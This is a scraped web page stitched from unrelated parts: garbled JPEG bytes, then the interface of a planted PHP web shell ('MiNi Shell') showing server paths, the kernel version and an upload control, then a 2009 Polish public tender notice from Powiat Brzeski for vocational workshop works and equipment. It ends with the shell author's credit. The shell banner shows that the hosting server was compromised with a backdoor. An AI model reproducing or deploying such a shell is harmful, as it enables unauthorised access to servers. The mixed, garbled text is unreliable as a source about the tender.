JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090518/152814-N-2009.html

<p class="kh_header"><b>Brzeg: Unowocześnienie bazy kształcenia zawodowego szkół ponadgimnazjalnych w Powiecie Brzeskim</b><br>
<b>Numer ogłoszenia: 152814 - 2009; data zamieszczenia: 18.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Brzeski , ul. Robotnicza 20, 49-300 Brzeg, woj. opolskie, tel. 077 444 79 00, faks 077 444 79 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeg-powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Unowocześnienie bazy kształcenia zawodowego szkół ponadgimnazjalnych w Powiecie Brzeskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
- przebudowa pomieszczeń hali warsztatowej w Brzegu przy ul. Kamiennej 1 na pracownie zajęć praktycznych dla zawodów budowlanych
- zakup wyposażenia do pracowni zajęć praktycznych dla przedmiotów budowlanych, pracowni dydaktycznej obrabiarek i pracowni dla zawodu technik pojazdów samochodowych oraz mechanik pojazdów samochodowych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wpłacić wadium dla  części I  zamówienia w wysokości: 28.000zł. brutto słownie: dwadzieścia osiem tysięcy
Wadium może być wniesione w jednej lub kilku następujących formach:
1	pieniądzu,
2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3	gwarancjach bankowych,
4	gwarancjach ubezpieczeniowych,
5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275).
Wadium wnoszone w pieniądzu powinno zostać przelane lub wpłacone na konto 
Bank Spółdzielczy Grodków - Łosiów z siedzibą w Grodkowie 
nr 76 8870 0005 2001 0030 2668 0004 z dopiskiem: Wadium na zadanie Unowocześnienie bazy kształcenia zawodowego szkół ponadgimnazjalnych w Powiecie Brzeskim -część I zamówienia<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> dot. wszystkich części zamówienia:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu:

DLA CZĘŚCI I ZAMÓWIENIA:
1. oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy Prawo zamówień publicznych (wzór - zał. nr 7 do SIWZ) - 
2. oświadczenie wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych (wzór - zał. nr 8 do SIWZ)
3. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
5. aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
6. aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
7. informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
	Warunek uważa się za spełniony, jeżeli wykonawca potwierdzi  wysokość posiadanych środków finansowych lub zdolność kredytową nie mniejszą niż: 1.100.000,00 zł. (słownie: jeden milion sto tysięcy zł.)
8. wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (wzór - zał. nr 9 do SIWZ)
	Warunek uważa się za spełniony , jeżeli wykonawca potwierdzi należyte wykonanie minimum pięciu robót budowlanych  odpowiadających  swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, o wartości brutto nie mniejszej niż: 1.100.000,00 zł. (słownie: jeden milion sto tysięcy zł.)
9. Certyfikat na znak jakości  I.S.O lub dokument równoważny dotyczący
jakości wykonywanych robót,
10. Informację o realizacjach w toku -  (wzór - zał. nr 10 do SIWZ)
11. Oświadczenia:
a) w sprawie podjęcia obowiązków przez kierownika budowy w specjalności konstrukcyjno - budowlanej na zał. nr 11 do siwz. Do oświadczenia należy dołączyć dokumenty potwierdzające posiadanie uprawnień (w okresie nie krótszym niż 5 lat) do pełnienia samodzielnych funkcji technicznych w budownictwie we wskazanych wyżej specjalnościach, czytelną kserokopię aktualnego zaświadczenia o przynależności do właściwej Izby Inżynierów Budownictwa, czytelną kserokopię decyzji lub zaświadczenia o wpisie do centralnego rejestru osób posiadających uprawnienia budowlane prowadzonego przez Głównego Inspektora Nadzoru Budowlanego (dotyczy tylko tych osób, które uzyskały uprawnienia budowlane po dniu 14 lutego 1995 roku)
b)w sprawie podjęcia obowiązków przez kierownika budowy w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  na zał. nr 12 do siwz. Do oświadczenia należy dołączyć dokumenty potwierdzające posiadanie uprawnień (w okresie nie krótszym niż 5 lat) do pełnienia samodzielnych funkcji technicznych w budownictwie we wskazanych wyżej specjalnościach, czytelną kserokopię aktualnego zaświadczenia o przynależności do właściwej Izby Inżynierów Budownictwa, czytelną kserokopię decyzji lub zaświadczenia o wpisie do centralnego rejestru osób posiadających uprawnienia budowlane prowadzonego przez Głównego Inspektora Nadzoru Budowlanego (dotyczy tylko tych osób, które uzyskały uprawnienia budowlane po dniu 14 lutego 1995 roku) 
c)w sprawie podjęcia obowiązków przez kierownika budowy w specjalności            instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych, i elektroenergetycznych na zał. nr 13 do siwz. Do oświadczenia należy dołączyć dokumenty potwierdzające posiadanie uprawnień (w okresie nie krótszym niż 5 lat) do pełnienia samodzielnych funkcji technicznych w budownictwie we wskazanych wyżej specjalnościach, czytelną kserokopię aktualnego zaświadczenia o przynależności do właściwej Izby Inżynierów Budownictwa, czytelną kserokopię decyzji lub zaświadczenia o wpisie do centralnego rejestru osób posiadających uprawnienia budowlane prowadzonego przez Głównego Inspektora Nadzoru Budowlanego (dotyczy tylko tych osób, które uzyskały uprawnienia budowlane po dniu 14 lutego 1995 roku)
12. Wykaz podwykonawców realizujących prace objęte zamówieniem (wzór - zał. nr 14 do siwz)
13. Polisę wraz z Ogólnymi Warunkami Ubezpieczenia, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca  posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności obejmujące ubezpieczenie szkód powstałych wyniku niewykonania lub nienależytego wykonania zobowiązania oraz ubezpieczenie szkód wyrządzonych przy wykonywaniu zobowiązania przez podwykonawców ubezpieczonego (o ile zamierza on wykonywać zamówienie przy pomocy podwykonawców) o wartości nie mniejszej niż 1.100 000,00 zł.


Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą  spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6 specyfikacji istotnych warunków zamówienia.
Z treści załączonych dokumentów musi wynikać jednoznacznie, że wykonawca spełnił warunki udziału w postępowaniu.

DLA CZĘŚCI II, III, IV, V, VI ZAMÓWIENIA:
1. oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy Prawo zamówień publicznych (wzór - zał. nr 7 do SIWZ) - 
2. oświadczenie wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych (wzór - zał. nr 8 do SIWZ)
3. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
5. aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
6. aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http:/powiat.brzeski.opolski.sisco.info/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, ul. Robotnicza 20, 49-300 Brzeg.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2009 godzina 09:00, miejsce: Starostwo Powiatowe, ul. Robotnicza 20, 49-300 Brzeg, biuro podawcze-parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie Projektu /Unowocześnienie bazy kształcenia zawodowego szkół ponadgimnazjalnych w Powiecie Brzeskim/ w ramach Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa pomieszczeń hali warsztatowej na pracownię zajęć praktycznych dla zawodów budowlanych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlano instalacyjnych przebudowy pomieszczeń hali warsztatowej w Brzegu przy ul. Kamiennej 1 na pracownię zajęć praktycznych dla zawodów budowlanych wg przedmiaru robót (załącznik nr 1 do siwz) oraz dokumentacji projektowej (załącznik nr 1a do siwz)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. gwarancja - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup wyposażenia do pracowni zajęć praktycznych dla przedmiotów budowlanych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyposażenie stanowisk do szkolenia w zakresie:
-murarstwa, tynkarstwa, posadzkarstwa
-miernictwa budowlanego
-konstrukcji i materiałów budowlanych
-renowacji, sztukatorstwa i kamieniarstwa
-Zestaw multimedialny do pokazów i ćwiczeń
-Niezbędne oprogramowanie fachowe
-Szatnia- przebieralnia (szafki, stoliki, krzesła)

Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.50.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup wyposażenia do pracowni dydaktycznej obrabiarek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
- tokarka CNC -szt.1
-frezarka CNC - szt.1
- oprogramowanie 3-wymiarowej grafiki 3D-View- kpl 1
-oprogramowanie MTS - szt.1
-pakiet WinTutorials - szt.1
- oprogramowanie sterujące - szt.1
-pulpit sterujący - szt.1
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 3 do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.62.11.00-6, 42.62.30.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup wyposażenia do pracowni dla zawodu technik pojazdów samochodowych i mechanik pojazdów samochodowych - INTERFEJS DIAGNOSTYCZNY Z OPROGRAMOWANIEM.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup interfejsu diagnostycznego z oprogramowaniem do diagnostyki różnychpojazdów.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 4 do specyfikacji istotnych warunków zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.70.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup wyposażenia do pracowni dla zawodu technik pojazdów samochodowych i mechanik pojazdów samochodowych - KOMPUTER - NOTEBOOK.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup komputera. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 5 do specyfikacji istotnych warunków zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup wyposażenia do pracowni dla zawodu technik pojazdów samochodowych i mechanik pojazdów samochodowych - ZESTAWY PANELOWE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup:
zestawów panelowych, tj.
-Oświetlenie pojazdu samochodowego
- Układy zapłonowe pojazdu
- Sensoryka systemów pojazdowych 
-Aktoryka systemów pojazdowych
-Podstawy elektroniki i elektrotechniki pojazdowej;
System wtryskowy paliwa typu KE-Jetronic,
Stanowisko demonstracyjne regulacji siły hamowania - ABS/ASR,
Stanowisko demonstracyjne systemu sterowania silnikiem Diesel Common Rail,
Silnik benzynowy rzędowy na stojaku obrotowym, 
Skrzynia przekładniowa ręczna, 
Układ kierowniczy ze wspomaganiem elektrohydraulicznym,
Skrzynia przekładniowa automatyczna .

Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6 do specyfikacji istotnych warunków zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.68.22.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com